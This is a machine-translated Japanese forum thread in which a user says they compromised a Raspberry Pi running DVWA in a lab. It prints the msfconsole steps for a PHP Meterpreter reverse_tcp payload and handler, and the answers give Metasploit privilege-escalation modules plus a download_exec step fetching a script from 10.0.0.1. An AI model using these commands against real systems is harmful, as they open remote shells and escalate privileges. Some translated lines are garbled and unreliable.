私はKali Linux、MSFConsole、DVWA(Damn Vulnerable Web Application)をいじっています。
PHPバックドアを作成し、SQLインジェクションを介してアップロードすることで、システム(Raspberry Pi)に正常にアクセスできました。
これでシステムにアクセスできました。唯一の問題は、www-dataとして実行していることです(rootになって自分のスーパーユーザーアカウントを作成するのはいいことではないでしょうか?)Linux(Raspbaian)で特権をエスカレートできますか? MSFConsole、BASH(バックドアから)、または別の方法を使用して?
Meterpreterプロンプトで「use priv」を実行しようとしましたが、「拡張機能のロードに失敗しました:ext_server_priv.phpという名前のモジュールが見つかりません」というエラーが表示されます。それが役立つ場合、reverse_tcpエクスプロイトをPHPスクリプトとして実行しています。
これを実行することでシステムを危険にさらすことができましたMsfconsole
use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit
次に、安全でないファイルのアップロードを介してhackme.phpをWebサーバーにアップロードしました。その後、アップロードしたファイルを参照しました。
クレジットは、上記のコードを提供してくれた このビデオ に送られます。 (msfpayloadの代わりに生成関数を使用する必要があったのは、その機能が廃止されたために移動されたためです。)
この時点で、システムの侵害の基本を達成し、権限昇格という悪用の一般的なフェーズ2に進んでいます。
正確にどのように達成できるかは、問題のシステム、システムにインストールされているコード、構成方法に大きく依存します。 Linuxシステムで特権昇格を取得するために探す必要のあるオプション
「実際の」セキュリティテストでより多く適用されるが、状況に適用される可能性が低いその他の事項
Metasploitのドキュメントによると、ユーザーprivはネイティブのWindows Meterpreterでのみ利用可能なモジュールです(他のMeterpreterではありません)。
おそらく、UNIXの特権の昇格について調べたいと思います。それを行うmetasploitの自動化モジュールがあるとは思いません...
幸運を ;)
シェルをセッション-u <#>でMeterpreterにアップグレードしてから、postモジュール(たとえば、post/multi/recon/local_exploit_suggester)を実行するか、既存のセッション(Meterpreterかどうか)を取得してローカル権限エスカレーションを実行することもできます。 SESSION変数を設定して、udev_netlink、sock_sendpageなどを悪用します。
一部のモジュールはOSまたはシナリオによって異なり、メタスプロイトフレームワーク階層で見つけるのが難しいモジュールもあります。 meterpreter内から以下を試してください。
投稿を表示
post/multi/
<tab><tab>
を実行しますpost/linux/
<tab><tab>
を実行しますエクスプロイト/マルチ/
<tab><tab>
を実行します
Metasploit-frameworkの外でさまざまな権限昇格ツールを実行して、セッションに起動することもできます。この取り組みを支援する2つのモジュールを次に示します。
post/multi/gather/multi_commandを使用
リソースcmds.rcを設定する
post/linux/manage/download_execを使用します
uRLを設定 http://10.0.0.1/cmds.sh
ラボでシステムを準備することをお勧めします。たとえば、同じOS、パッチレベル、インストール可能ファイル、構成設定など、ターゲットシステムの 品質に一致 です。このモックアップされたラボターゲットでrootアクセスを維持することにより、実際のターゲットに対して実行しようとすることを再作成できます。多くの特権エスカレーションツールは、それらを適切に実行するためにルートアクセスを必要とします。たとえば、資格情報モードでのNessusおよびOpenVAS、CIS-CAT、ovaldi、cvechecker、lynis、unix-privesc-check、およびenum4linuxは、すべてこの優れたツールです。スペース。その他のプログラムは、実際のターゲットシステムでのみ実行する必要があります。 custom setuid/setgid バイナリの悪用など、一部の権限昇格攻撃では大幅に多くの計画が必要です。 RPiはエクスプロイトのためにクロスコンパイラーを必要とする可能性が高く、オフセットを変更してARMプラットフォームのレジスター、オペコード、エンディアンネスを操作しない限り、多くの場合は機能しません。